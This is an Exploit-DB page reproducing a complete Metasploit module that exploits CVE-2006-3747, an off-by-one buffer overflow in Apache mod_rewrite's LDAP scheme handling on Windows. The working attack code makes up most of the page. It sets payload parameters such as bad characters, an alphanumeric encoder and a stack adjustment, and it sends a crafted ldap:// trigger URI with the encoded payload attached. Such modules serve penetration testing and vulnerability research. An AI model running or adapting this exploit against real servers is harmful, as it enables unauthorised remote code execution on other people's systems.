Apache mod_rewrite - LDAP protocol Buffer Overflow (Metasploit)

EDB-ID:

16752

CVE:

2006-3747

EDB Verified:

Author:

Metasploit

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2010-02-15

Vulnerable App: 
##
# $Id: apache_mod_rewrite_ldap.rb 8498 2010-02-15 00:48:03Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apache module mod_rewrite LDAP protocol Buffer Overflow',
			'Description'    => %q{
				This module exploits the mod_rewrite LDAP protocol scheme handling
				flaw discovered by Mark Dowd, which produces an off-by-one overflow.
				Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
				This module requires REWRITEPATH to be set accurately. In addition,
				the target must have 'RewriteEngine on' configured, with a specific
				'RewriteRule' condition enabled to allow for exploitation.

				The flaw affects multiple platforms, however this module currently
				only supports Windows based installations.
			},
			'Author'         => 'patrick',
			'Version'        => '$Revision: 8498 $',
			'References'     =>
				[
					[ 'CVE', '2006-3747' ],
					[ 'OSVDB', '27588' ],
					[ 'BID', '19204' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/3680' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/3996' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/2237' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Platform'       => ['win'], # 'linux'],
			'Payload'        =>
				{
					'Space'    => 636,
					'BadChars' => "\x00\x0a\x0d\x20",
					'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
					'StackAdjustment' => -3500,
					'DisableNops'  =>  'True',
				},
			'Targets'        =>
				[
					[  'Automatic', {} ], # patrickw tested OK 20090310 win32
				],
			'DisclosureDate' => 'Jul 28 2006',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
				], self.class)
	end


	def check
		res = send_request_raw({
			'uri'     => '/',
			'version' => '1.1',
		}, 2)

		if (res.to_s =~ /Apache/) # This could be smarter.
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe

	end

	def exploit

		# On Linux Apache, it is possible to overwrite EIP by
		# sending ldap://<buf> ... TODO patrickw

		trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'

		print_status("Sending payload.")
		send_request_raw({
				'uri'     => '/' + datastore['REWRITEPATH'] + trigger + payload.encoded,
				'version' => '1.0',
				}, 2)
		handler
	end
end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services